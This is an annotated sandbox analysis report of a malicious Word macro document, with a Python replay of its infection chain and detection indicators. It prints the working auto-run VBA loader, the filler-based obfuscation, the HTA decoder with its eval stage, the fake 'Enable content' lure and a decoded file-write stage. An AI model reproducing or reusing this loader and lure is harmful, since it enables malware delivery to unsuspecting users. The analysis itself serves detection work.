Dynamic Analysis Report
Created on 2021-12-31T11:49:00
Sample: ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc (Word Document)
Verdict | Malicious |
Classifications | - |
Threat Names | Mal/Generic-S |
Remarks (1/1)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "1 hour" to "20 seconds" to reveal dormant functionality.
Files: the list below contains the sample file together with the embedded, downloaded, and dropped files of this analysis.
File Name | Category | Type | Verdict |
---|---|---|---|
C:\Users\kEecfMwgj\Desktop\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc | Sample File | Word Document | malicious |
File Reputation Information
Verdict | malicious |
Names | Mal/Generic-S |
Office Information
Category | explorer |
Description | ta |
Last Modified By | Пользователь Windows (Russian for "Windows User") |
Revision | 2 |
Create Time | 2021-12-27 11:02:00+00:00 |
Modify Time | 2021-12-27 11:02:00+00:00 |
Codepage | ANSI_Cyrillic |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal |
Company | ript.sh |
Document Security | NONE |
Page Count | 1 |
Line Count | 65 |
Paragraph Count | 1 |
Word Count | 116 |
Character Count | 16118 |
Chars With Spaces | 16233 |
bytes | 26624 |
scale_crop | False |
shared_doc | False |
Controls (1)
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
VBA Macros (2)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Deletes every occurrence of the filler string "s3x" from the document body
' (Replace:=2 is wdReplaceAll). The body is the obfuscated HTA shown in the
' Document Content Snippet below; after this call it is plain HTML/script.
Function contents()
    With ActiveDocument.Content
        superI7Center = .Find.Execute(FindText:="s3x", ReplaceWith:="", Replace:=2)
    End With
End Function

' Reads a built-in document property by name. The strings the macro needs
' ("ript.sh", "explorer", "ta") live in the Office metadata, not in the VBA,
' so no suspicious literal appears in the code. Every call also runs
' contents(), which deobfuscates the body before it is saved.
Function cont1(i7ComputerMonitor)
    cont1 = ActiveDocument.BuiltInDocumentProperties(i7ComputerMonitor).Value
    contents
End Function

' "wsc" & Company ("ript.sh") & "ell" = "wscript.shell". The command line is
' Category ("explorer") followed by the file name, so Explorer opens the
' dropped .hta through its file association instead of the macro naming mshta.
Public Function srn1(mouseVideo)
    CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo
End Function

' Auto-exec entry point: runs as soon as the document is opened with macros enabled.
Sub Document_Open()
    hny
End Sub

Macro #2: main
Attribute VB_Name = "main"
' Builds the output name "i7Gigabyte.h" & Comments ("ta", the Description
' value above) = "i7Gigabyte.hta", saves the now-deobfuscated body as plain
' text (FileFormat:=2 is wdFormatText) and hands the file to srn1().
Public Sub hny()
    processorI9 = Trim("i7Gigabyte.h" & ThisDocument.cont1("comments"))
    ActiveDocument.SaveAs2 FileName:=processorI9, FileFormat:=2
    ThisDocument.srn1 processorI9
End Sub
Document Content Snippet
<s3xhs3xts3xms3xls3x>s3x<s3xbs3xos3xds3xys3x>s3x<s3xps3x s3xis3xds3x=s3x's3xps3xrs3xos3xcs3xes3xss3xss3xos3xrs3xRs3xts3xxs3x's3x s3xss3xts3xys3xls3xes3x=s3x's3xfs3xos3xns3xts3x-s3xcs3xos3xls3xos3xrs3x:s3x s3x#s3x0s3x0s3x0s3x's3x>s3xes3xvs3xas3xls3x<s3x/s3xps3x>s3x<s3xps3x s3xis3xds3x=s3x's3xrs3xts3xxs3xIs3x7s3x's3x s3xss3xts3xys3xls3xes3x=s3x's3xfs3xos3xns3xts3x-s3xcs3xos3xls3xos3xrs3x:s3x s3x#s3x0s3x0s3x0s3x's3x>s3xfs3xXs3x1s3x7s3xKs3xWs3xUs3xos3xas3xGs3xNs3x0s3xYs3xWs3xNs3x9s3xOs3x2s3xVs3xzs3xbs3x2s3xxs3xjs3xLs3xns3xhs3x0s3xUs3xms3x9s3xls3xZs3xGs3xls3xWs3xZs3xWs3xxs3xis3xYs3xXs3xQs3x7s3xKs3xTs3xIs3xgs3xLs3xCs3xJs3xns3xcs3xGs3xos3xus3xNs3x0s3xls3xls3xds3xHs3xls3xis3xYs3xWs3xds3xps3xZs3x1s3xxs3xcs3xYs3x2s3xls3xss3xYs3xns3xVs3xws3xXs3xFs3xxs3xzs3xcs3xms3xVs3xzs3xds3xVs3xxs3xcs3xOs3xms3xMs3xis3xKs3xGs3xVs3xss3xas3xWs3xZs3xvs3xds3xGs3xVs3x2s3xYs3xXs3xMs3xus3xes3xHs3xRs3xSs3xbs3x2s3xVs3xks3xas3xVs3xZs3xls3xbs3xGs3xJs3xhs3xds3xD ...
Every character of the body is followed by the filler "s3x" that the contents() macro removes. With the filler taken out, the same snippet reads:
<html><body><p id='processorRtx' style='font-color: #000'>eval</p><p id='rtxI7' style='font-color: #000'>fX17KWUoaGN0YWN9O2Vzb2xjLnh0Um9lZGlWZWxiYXQ7KTIgLCJncGouN0lldHliYWdpZ1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMueHRSb2VkaVZlbGJhdD...
Extracted Image Texts (1)
Image 1: 0.PNG
This document created in previous version of Microsoft Office Word
To view or edit this document, please click “Enable editing” button
on the top bar, and then click “Enable content”
CFB Streams (16)
Name | ID | Size |
---|---|---|
Root\Data | 1 | 26.02 KB |
Root\Table | 2 | 7.05 KB |
Root\WordDocument | 3 | 19.06 KB |
Root\SummaryInformation | 4 | 4.00 KB |
Root\DocumentSummaryInformation | 5 | 4.00 KB |
Root\Macros\VBA\ThisDocument | 8 | 2.36 KB |
Root\Macros\VBA\__SRP_2 | 9 | 983 Bytes |
Root\Macros\VBA\__SRP_3 | 10 | 364 Bytes |
Root\Macros\VBA\main | 11 | 1.08 KB |
Root\Macros\VBA\_VBA_PROJECT | 12 | 2.83 KB |
Root\Macros\VBA\dir | 13 | 553 Bytes |
Root\Macros\VBA\__SRP_0 | 14 | 1.67 KB |
Root\Macros\VBA\__SRP_1 | 15 | 241 Bytes |
Root\Macros\PROJECTwm | 16 | 56 Bytes |
Root\Macros\PROJECT | 17 | 398 Bytes |
Root\CompObj | 18 | 114 Bytes |
c:\users\keecfmwgj\documents\~wrd0000.tmp | Dropped File | HTML | clean |
Extracted JavaScripts (4)
JavaScript #1
// Thin wrappers that keep the sensitive calls out of plain sight.
function centerAsusSuper(i9I9Table) { return (new ActiveXObject(i9I9Table)); }                  // ActiveXObject factory (not called in the visible code)
function cardI9Processor(i9VideoMouse) { return (tableNotebook.getElementById(i9VideoMouse).innerHTML); } // read a <p> element's text by id
function i7ProcessorCard(processorAsus) { return ('cha' + processorAsus); }                      // 'cha' + x (not called in the visible code)
// Base64 decoder; the alphabet is read from the page element 'notebookGigabyteGigabyte' rather than hard-coded.
function tableI9I9(processorMonitorSuper) {
    var notebookProcessor = cardI9Processor('notebookGigabyteGigabyte');
    var videoSuper = "";
    var superProcessorI9, cardKeyboard, computerComputerSuper;
    var notebookMouseComputer, gigabyteTableComputer, processorGigabyte, tableCenter;
    var cardRtxCard = 0;
    processorMonitorSuper = processorMonitorSuper.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (cardRtxCard < processorMonitorSuper.length) {
        // four alphabet indices in, three characters out; index 64 ('=') marks padding
        notebookMouseComputer = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));
        gigabyteTableComputer = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));
        processorGigabyte = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));
        tableCenter = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));
        superProcessorI9 = (notebookMouseComputer << 2) | (gigabyteTableComputer >> 4);
        cardKeyboard = ((gigabyteTableComputer & 15) << 4) | (processorGigabyte >> 2);
        computerComputerSuper = ((processorGigabyte & 3) << 6) | tableCenter;
        videoSuper = videoSuper + String.fromCharCode(superProcessorI9);
        if (processorGigabyte != 64) { videoSuper = videoSuper + String.fromCharCode(cardKeyboard); }
        if (tableCenter != 64) { videoSuper = videoSuper + String.fromCharCode(computerComputerSuper); }
    }
    return (videoSuper);
}
function i7AsusVideo(i7Processor) { return i7Processor.split('').reverse().join(''); }          // reverse a string
function monitorMonitorRtx(processorAsus) { return (i7AsusVideo(tableI9I9(processorAsus))); }   // decode, then reverse
function asusProcessorMonitor(processorAsus, centerNotebook) { return (processorAsus.split(centerNotebook)); } // split helper (not called in the visible code)
cardTableMonitor = window;
tableNotebook = document;
cardTableMonitor['moveTo'](-101, -102);                       // move the HTA window off-screen
var tableRtx = cardI9Processor('rtxI7').split("---");        // payload blobs stored in <p id='rtxI7'>, separated by "---"
var cardComputerMonitor = monitorMonitorRtx(tableRtx[0]);    // first decoded stage
var rtxI7Super = monitorMonitorRtx(tableRtx[1]);             // second decoded stage
JavaScript #2
// cardTableMonitor[...] resolves to window['eval'], because <p id='processorRtx'> holds the string "eval"
function rtxVideo(processorProcessorVideo) { cardTableMonitor[cardI9Processor('processorRtx')](processorProcessorVideo); }
JavaScript #3
' VBScript syntax (Call ... : Call ...): executes the two decoded stages in order
Call rtxVideo(cardComputerMonitor) : Call rtxVideo(rtxI7Super)
JavaScript #4
cardTableMonitor['close']();   // window.close(): the HTA exits once the stages have run
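Added example, written in Python for this page; it is not code from the report, the sample, or any analysis tool. It replays the chain on paper: the macro's strings are resolved from the Office Information values, the "s3x" filler is stripped as contents() does, and the decoder from JavaScript #1 is ported and applied to the blob in <p id='rtxI7'> the way JavaScript #3 would, without executing anything. Two assumptions are marked in the code: the Comments property is taken to be the Description value "ta" (consistent with the dropped owner file ~$gigabyte.hta), and the alphabet that the script reads from <p id='notebookGigabyteGigabyte'>, which the snippet does not show, is taken to be the standard base64 alphabet. Because the script reverses each decoded string, the truncated start of the blob yields the tail of the first stage.

```python
import re

# Office properties from the report's Office Information table. The VBA reads
# them back through BuiltInDocumentProperties, so these strings never appear in
# the macro source. Assumption: "comments" is the Description row ("ta"); the
# dropped owner file ~$gigabyte.hta (what Word creates while i7Gigabyte.hta is
# open) corroborates it.
DOC_PROPS = {"company": "ript.sh", "category": "explorer", "comments": "ta"}
WD_FORMAT_TEXT = 2  # FileFormat:=2 in SaveAs2: the body is written as plain text

# Constructed input: the body as the report's Document Content Snippet shows it
# (the report truncates it inside the rtxI7 element).
BODY_SNIPPET = (
    "<s3xhs3xts3xms3xls3x>s3x<s3xbs3xos3xds3xys3x>s3x"
    "<s3xps3x s3xis3xds3x=s3x's3xps3xrs3xos3xcs3xes3xss3xss3xos3xrs3xRs3xts3xxs3x's3x"
    " s3xss3xts3xys3xls3xes3x=s3x's3xfs3xos3xns3xts3x-s3xcs3xos3xls3xos3xrs3x:s3x"
    " s3x#s3x0s3x0s3x0s3x's3x>s3xes3xvs3xas3xls3x<s3x/s3xps3x>s3x"
    "<s3xps3x s3xis3xds3x=s3x's3xrs3xts3xxs3xIs3x7s3x's3x"
    " s3xss3xts3xys3xls3xes3x=s3x's3xfs3xos3xns3xts3x-s3xcs3xos3xls3xos3xrs3x:s3x"
    " s3x#s3x0s3x0s3x0s3x's3x>s3x"
    "fs3xXs3x1s3x7s3xKs3xWs3xUs3xos3xas3xGs3xNs3x0s3xYs3xWs3xNs3x9s3xOs3x2s3xVs3xzs3x"
    "bs3x2s3xxs3xjs3xLs3xns3xhs3x0s3xUs3xms3x9s3xls3xZs3xGs3xls3xWs3xZs3xWs3xxs3xis3x"
    "Ys3xXs3xQs3x7s3xKs3xTs3xIs3xgs3xLs3xCs3xJs3xns3xcs3xGs3xos3xus3xNs3x0s3xls3xls3x"
    "ds3xHs3xls3xis3xYs3xWs3xds3xps3xZs3x1s3xxs3xcs3xYs3x2s3xls3xss3xYs3xns3xVs3xws3x"
    "Xs3xFs3xxs3xzs3xcs3xms3xVs3xzs3xds3xVs3xxs3xcs3xOs3xms3xMs3xis3xKs3xGs3xVs3xss3x"
    "as3xWs3xZs3xvs3xds3xGs3xVs3x2s3xYs3xXs3xMs3xus3xes3xHs3xRs3xSs3xbs3x2s3xVs3xks3x"
    "as3xVs3xZs3xls3xbs3xGs3xJs3xhs3xds3xD"
)

# Assumption: the alphabet JavaScript #1 reads from <p id='notebookGigabyteGigabyte'>
# lies outside the snippet; the standard base64 alphabet ('=' at index 64, the
# value the decoder tests for) is assumed, and the readable output confirms it.
STANDARD_ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                     "0123456789+/=")

def contents(body):
    """Function contents(): Find.Execute(FindText:="s3x", ReplaceWith:="", Replace:=2 [wdReplaceAll])."""
    return body.replace("s3x", "")

def resolve_macro(props, body):
    """Replays Sub hny() / srn1() without running anything and returns the values."""
    file_name = ("i7Gigabyte.h" + props["comments"]).strip()  # Trim(...)
    return {
        "progid": "wsc" + props["company"] + "ell",      # CreateObject(...)
        "filename": file_name,                            # SaveAs2 FileName:=
        "save_format": WD_FORMAT_TEXT,                    # SaveAs2 FileFormat:=
        "command": props["category"] + " " + file_name,   # .exec ...
        "hta_text": contents(body),                       # what SaveAs2 writes
    }

def inner_html(html, elem_id):
    """Stand-in for document.getElementById(id).innerHTML (cardI9Processor)."""
    m = re.search(r"<p id='%s'[^>]*>(.*?)(?:</p>|$)" % re.escape(elem_id), html, re.S)
    if m is None:
        raise KeyError(elem_id)
    return m.group(1)

def js_b64_decode(data, alphabet):
    """Port of tableI9I9(), quirks included: non-base64 characters are dropped,
    index 64 ('=') in the third or fourth slot suppresses output bytes, and a
    read past the end yields index 0 because JavaScript's indexOf("") is 0."""
    data = re.sub(r"[^A-Za-z0-9+/=]", "", data)
    out = []
    for i in range(0, len(data), 4):
        e = [alphabet.find(data[i + k]) if i + k < len(data) else 0 for k in range(4)]
        c1 = (e[0] << 2) | (e[1] >> 4)
        c2 = ((e[1] & 15) << 4) | (e[2] >> 2)
        c3 = ((e[2] & 3) << 6) | e[3]
        out.append(chr(c1 & 0xFFFF))  # String.fromCharCode keeps 16 bits
        if e[2] != 64:
            out.append(chr(c2 & 0xFFFF))
        if e[3] != 64:
            out.append(chr(c3 & 0xFFFF))
    return "".join(out)

def decode_stage(blob, alphabet=STANDARD_ALPHABET):
    """Port of monitorMonitorRtx(): decode, then reverse (i7AsusVideo)."""
    return js_b64_decode(blob, alphabet)[::-1]

def replay_hta(html, alphabet=STANDARD_ALPHABET):
    """Replays JavaScript #1 and #3: sink name from <p id='processorRtx'>, the
    '---'-separated blobs from <p id='rtxI7'>. Returns (sink, stages); each stage
    is the string the HTA would hand to window[sink]."""
    sink = inner_html(html, "processorRtx")
    stages = []
    for blob in inner_html(html, "rtxI7").split("---"):
        blob = blob.strip()
        # The snippet is cut off mid-blob: right-pad to a multiple of four so the
        # dangling group decodes like real '=' padding instead of emitting stray
        # bytes through the indexOf("") quirk. A complete blob is unchanged.
        blob += "=" * (-len(blob) % 4)
        stages.append(decode_stage(blob, alphabet))
    return sink, stages
```

Calling resolve_macro(DOC_PROPS, BODY_SNIPPET) gives the ProgID wscript.shell, the file name i7Gigabyte.hta and the command line explorer i7Gigabyte.hta; feeding its hta_text to replay_hta() gives the sink name eval and one recovered stage, which reads tableVideoRtx.savetofile("c:\\users\\public\\gigabyteI7.jpg", 2);tableVideoRtx.close;}catch(e){}}. That is a SaveToFile/Close pair inside a try/catch, i.e. the end of a routine that writes downloaded content to c:\users\public\gigabyteI7.jpg (the calling pattern of an ADODB.Stream write, although the object creation and the download itself lie outside the snippet, as does the second blob after "---"). Nothing here runs the sample; the stage is only returned as a string. For detection, note that neither mshta nor wscript appears literally anywhere in the document: the useful indicators are a macro that feeds BuiltInDocumentProperties values into CreateObject, a SaveAs2 with FileFormat 2 to a .hta name, and explorer.exe starting mshta.exe with an .hta from the user's Documents folder.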
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.word\~wrd0003.doc | Dropped File | Unknown | clean |
c:\users\keecfmwgj\documents\~$gigabyte.hta | Dropped File | Stream | clean |